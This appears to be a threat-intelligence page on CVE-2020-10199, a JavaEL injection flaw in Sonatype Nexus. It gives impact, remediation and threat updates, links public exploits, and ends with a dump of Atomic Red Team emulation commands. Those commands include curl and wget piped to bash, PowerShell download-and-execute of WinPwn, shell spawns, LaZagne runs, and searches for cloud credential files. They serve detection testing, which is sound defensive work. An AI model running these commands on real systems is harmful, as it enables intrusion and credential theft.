CVE-2020-10199
Overview
This vulnerability is a Java Expression Language (JavaEL) injection affecting Sonatype Nexus Repository versions prior to 3.21.2. The root cause lies in improper input sanitization within the repository's REST API endpoints, allowing untrusted user input to be evaluated as JavaEL expressions. The affected components include the session management and repository group services that process user-supplied parameters without adequate validation.
Vulnerability Description
Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
Impact
An attacker with a low-privileged authenticated account can execute arbitrary code on the affected system remotely without user interaction. This enables full system compromise, including unauthorized data access, modification, or destruction, and potentially lateral movement within the network. The vulnerability allows attackers to bypass normal security controls by leveraging JavaEL injection to execute commands with the privileges of the Nexus Repository service.
Solution
Sonatype recommends upgrading Nexus Repository to version 3.21.2 or later, as detailed in their advisory at https://support.sonatype.com/hc/en-us/articles/360044882533. This update addresses the JavaEL injection vulnerability by implementing proper input validation and sanitization. No specific workaround is provided; applying the vendor-supplied patch is the only effective remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Sonatype Nexus Repository, specifically related to Java Expression Language (JavaEL) injection, poses a significant risk to the security of applications that rely on this repository for managing software components. JavaEL injection occurs when an attacker is able to manipulate the Java Expression Language used within the application, allowing them to execute arbitrary expressions or commands. This vulnerability arises from insufficient validation of user input, which can lead to the execution of malicious payloads. The affected versions prior to 3.21.2 lack the necessary safeguards to prevent such injections, making it easier for attackers to exploit the system.
Attack vectors for this vulnerability are varied, but they generally involve an attacker crafting a malicious request that includes specially formatted input targeting the JavaEL processing capabilities of the Nexus Repository. For instance, an attacker could exploit this vulnerability by sending crafted HTTP requests that include malicious JavaEL expressions. If successful, the attacker could gain unauthorized access to sensitive data, execute arbitrary code, or manipulate the repository’s functionality. This could lead to further attacks within the organization, such as data breaches or the deployment of compromised software components.
The real-world impact of this vulnerability can be severe, especially for organizations that rely on Nexus Repository for their software supply chain management. The exploitation of this vulnerability could lead to unauthorized access to proprietary code, sensitive configuration files, or even the ability to alter software components stored within the repository. The business risks associated with such an incident include financial losses, reputational damage, and potential legal ramifications due to non-compliance with data protection regulations. Organizations may face significant operational disruptions as they respond to the breach and work to secure their systems against future attacks.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating the Nexus Repository to the latest version is crucial, as newer releases often include patches for known vulnerabilities. Additionally, organizations should employ web application firewalls (WAFs) that can detect and block malicious requests targeting JavaEL injection. Conducting regular security assessments, including penetration testing and vulnerability scanning, can help identify potential weaknesses in the system before they can be exploited. Furthermore, ensuring that input validation and sanitization processes are robust can significantly reduce the risk of injection attacks.
In conclusion, the JavaEL injection vulnerability within Sonatype Nexus Repository represents a critical security concern that organizations must address proactively. By understanding the technical details, potential attack vectors, and the real-world implications of exploitation, organizations can better prepare themselves against such threats. Implementing effective detection and mitigation strategies will not only help in safeguarding the repository but also contribute to the overall security posture of the organization, ensuring that software supply chains remain resilient against evolving cyber threats.
CSURFACE threat intelligence has identified a significant expansion in the exploit landscape for CVE-2020-10199, marked by the emergence of multiple public proof-of-concept exploits and the integration of a Metasploit module. This development substantially lowers the technical barrier for adversaries, enabling a broader range of threat actors to weaponize the JavaEL injection vulnerability in Sonatype Nexus Repository versions prior to 3.21.2. The inclusion of this vulnerability in the CISA Known Exploited Vulnerabilities catalog further underscores its elevated risk profile and prioritization by national cybersecurity authorities. Correspondingly, the CVSS score adjustment to 8.8 and the high Exploit Prediction Scoring System (EPSS) value reflect an increased likelihood of active exploitation attempts. Our telemetry indicates a marked escalation in exploit activity, signaling a shift from theoretical risk to practical threat. This evolution necessitates heightened vigilance from defenders, as the availability of automated and publicly accessible exploit tools accelerates potential compromise scenarios. Consequently, the threat level associated with CVE-2020-10199 has escalated from moderate concern to a critical priority within the current threat environment.
Update 2 — July 03, 2026
CSURFACE threat intelligence has identified a modest uptick in detection activity related to CVE-2020-10199, indicating a continued but measured increase in exploitation attempts. This rise, while not explosive, underscores persistent adversary interest in leveraging the JavaEL injection vulnerability within Sonatype Nexus Repository versions prior to 3.21.2. Concurrently, the proliferation of new proof-of-concept exploits with graphical interfaces and updated remote code execution tools enhances the accessibility of attack methods for less sophisticated threat actors. Although the EPSS score remains stable at a high level, the combination of increased telemetry signals and expanding exploit tool availability suggests a sustained threat environment that could facilitate broader compromise scenarios. For defenders, this evolving landscape demands ongoing monitoring as the vulnerability remains a viable vector for intrusion, particularly given the authenticated nature of some exploits. Consequently, the threat level associated with CVE-2020-10199 should be regarded as persistently high, reflecting sustained adversarial engagement and the potential for opportunistic exploitation.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Sonatype | Nexus | All |
cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Nexus Repository Manager Java EL Injection RCE
exploits/linux/http/nexus_repo_manager_el_injection
|
Alvaro Muñoz, wvu | Unknown | - | View |
ExploitDB (2)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated) | 1F98D | webapps | java | - | View |
| Nexus Repository Manager - Java EL Injection RCE (Metasploit) | Metasploit | remote | linux | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zhzyker/CVE-2020-10199_POC-EXP
CVE-2020-10199 Nexus <= 3.21.1 远程代码执行脚本(有回显)
|
zhzyker | 43 | 14 | 2020-04-16 | View |
|
jas502n/CVE-2020-10199
CVE-2020-10199、CVE-2020-10204、CVE-2020-11444
|
jas502n | 35 | 9 | 2020-04-08 | View |
|
aleenzz/CVE-2020-10199
CVE-2020-10199 回显版本
|
aleenzz | 31 | 10 | 2020-05-15 | View |
|
magicming200/CVE-2020-10199_CVE-2020-10204
CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.
|
magicming200 | 25 | 9 | 2020-04-08 | View |
|
wsfengfan/CVE-2020-10199-10204
CVE-2020-10199 CVE-2020-10204 Python POC
|
wsfengfan | 19 | 6 | 2020-04-07 | View |
|
hugosg97/CVE-2020-10199-Nexus-3.21.01
Sonatype Nexus 3.21.01 - Remote Code Execution (Authenticated - Updated)
|
hugosg97 | 0 | 1 | 2023-06-13 | View |
|
finn79426/CVE-2020-10199
|
finn79426 | 0 | 0 | 2025-05-21 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-10199 |
| support.sonatype.com |
GitHub CVE
x_refsource_CONFIRM
|
https://support.sonatype.com/hc/en-us/articles/360044882533 |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/157261/Nexus-Repository-Manager-3.21.1-01-Remote-Code-Execution.html |
| packetstormsecurity.com |
GitHub CVE
x_refsource_MISC
|
http://packetstormsecurity.com/files/160835/Sonatype-Nexus-3.21.1-Remote-Code-Execution.html |
| cwe.mitre.org |
GitHub CVE
x_refsource_MISC
|
https://cwe.mitre.org/data/definitions/917.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-10199 |